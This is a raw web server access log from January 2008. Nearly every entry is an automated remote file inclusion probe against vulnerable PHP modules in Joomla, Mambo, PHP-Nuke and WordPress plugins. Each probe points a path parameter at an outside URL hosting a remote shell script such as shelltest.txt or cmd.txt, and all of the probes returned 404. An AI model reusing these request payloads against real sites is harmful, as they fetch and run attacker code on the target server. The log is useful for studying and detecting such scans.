74.205.81.50 - - [16/Jan/2008:17:15:59 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.81.50 - - [16/Jan/2008:17:16:00 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.149.191 - - [16/Jan/2008:17:16:22 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.25.149.191 - - [16/Jan/2008:17:16:22 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_path=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
213.194.149.12 - - [16/Jan/2008:17:19:47 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
81.177.22.242 - - [16/Jan/2008:17:19:55 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carruga.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [16/Jan/2008:17:20:01 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_path=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
193.111.201.15 - - [16/Jan/2008:17:20:28 -0800] "GET /logs/access_071229.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:17:22:22 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:17:22:22 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.25.149.191 - - [16/Jan/2008:17:24:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.25.149.191 - - [16/Jan/2008:17:24:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
213.194.149.12 - - [16/Jan/2008:17:24:43 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.194.149.12 - - [16/Jan/2008:17:24:43 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
87.230.81.72 - - [16/Jan/2008:17:27:51 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.230.81.72 - - [16/Jan/2008:17:27:51 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.120.241.242 - - [16/Jan/2008:17:27:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
216.120.241.242 - - [16/Jan/2008:17:27:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.36.168.242 - - [16/Jan/2008:17:35:19 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.168.242 - - [16/Jan/2008:17:35:19 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.168.242 - - [16/Jan/2008:17:35:19 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.2.228.90 - - [16/Jan/2008:17:36:04 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_path=http://h1.ripway.com/spyd/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:17:38:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:17:38:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:17:42:38 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:17:42:57 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:17:42:57 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.117.233.130 - - [16/Jan/2008:17:43:25 -0800] "GET /view.php?table=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [16/Jan/2008:17:43:25 -0800] "GET /logs/view.php?table=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:17:46:24 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://yaoi.org.ru/nuseo/asc???????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:17:46:24 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://yaoi.org.ru/nuseo/asc???????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:17:46:25 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://yaoi.org.ru/nuseo/asc???????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:17:46:25 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yaoi.org.ru/nuseo/asc???????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:17:46:25 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://yaoi.org.ru/nuseo/asc???????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:17:46:25 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yaoi.org.ru/nuseo/asc???????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:17:47:33 -0800] "GET /logs/access_080101.log/amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://yaoi.org.ru/nuseo/asc???????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:17:47:34 -0800] "GET /amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://yaoi.org.ru/nuseo/asc???????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:17:47:34 -0800] "GET /logs/amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://yaoi.org.ru/nuseo/asc???????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.159.26 - - [16/Jan/2008:17:47:42 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.16.157 - - [16/Jan/2008:17:50:44 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
69.94.35.56 - - [16/Jan/2008:17:55:51 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.35.56 - - [16/Jan/2008:17:55:51 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.35.56 - - [16/Jan/2008:17:55:51 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.21.39 - - [16/Jan/2008:17:59:23 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rise.dk/cache/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
128.121.21.39 - - [16/Jan/2008:17:59:23 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rise.dk/cache/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
64.38.43.162 - - [16/Jan/2008:17:59:23 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://59.105.213.128/appserv/ascid.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:17:59:29 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:17:59:29 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.194.149.12 - - [16/Jan/2008:17:59:33 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.194.149.12 - - [16/Jan/2008:17:59:33 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://64.40.146.64/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
87.117.17.226 - - [16/Jan/2008:18:00:28 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.2.228.90 - - [16/Jan/2008:18:02:09 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/spyd/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.2.228.90 - - [16/Jan/2008:18:02:09 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/spyd/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.162.134.137 - - [16/Jan/2008:18:02:29 -0800] "GET /dministrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:18:02:53 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:18:02:53 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.8.232.250 - - [16/Jan/2008:18:03:06 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:18:03:09 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33132 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:18:03:10 -0800] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:18:03:10 -0800] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:18:03:10 -0800] "GET /warboard/images/update.gif HTTP/1.1" 200 245 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:18:03:10 -0800] "GET /warboard/images/delete.gif HTTP/1.1" 200 213 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:18:03:10 -0800] "GET /warboard/images/details.gif HTTP/1.1" 200 215 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:18:03:15 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:03:49 -0800] "GET /logs/access_071230.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:03:50 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:03:50 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:04:53 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:04:54 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:04:54 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.22.242 - - [16/Jan/2008:18:05:03 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carruga.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.22.242 - - [16/Jan/2008:18:05:04 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carruga.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [16/Jan/2008:18:05:05 -0800] "GET /logs/access_071229.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.233.130 - - [16/Jan/2008:18:05:35 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [16/Jan/2008:18:05:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
81.177.22.242 - - [16/Jan/2008:18:05:44 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carruga.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.35.56 - - [16/Jan/2008:18:05:56 -0800] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.35.56 - - [16/Jan/2008:18:05:56 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.35.56 - - [16/Jan/2008:18:05:57 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:06:18 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:06:18 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:06:19 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.137 - - [16/Jan/2008:18:06:34 -0800] "GET /logs/access_071229.log/dministrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.137 - - [16/Jan/2008:18:06:34 -0800] "GET /dministrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.137 - - [16/Jan/2008:18:06:34 -0800] "GET /logs/dministrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.137 - - [16/Jan/2008:18:06:37 -0800] "GET /logs/access.log/dministrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.159.26 - - [16/Jan/2008:18:06:39 -0800] "GET /logs/access_071228.log//modules/4nAlbum/public/displayCategory.php?basepath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.159.26 - - [16/Jan/2008:18:06:39 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:07:08 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:07:09 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:07:09 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.16.157 - - [16/Jan/2008:18:07:48 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.157 - - [16/Jan/2008:18:07:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.120.241.242 - - [16/Jan/2008:18:07:56 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
216.120.241.242 - - [16/Jan/2008:18:07:57 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.208.16.157 - - [16/Jan/2008:18:08:12 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:08:42 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:09:36 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:18:10:30 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebtown.com/valeboticario/birosca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
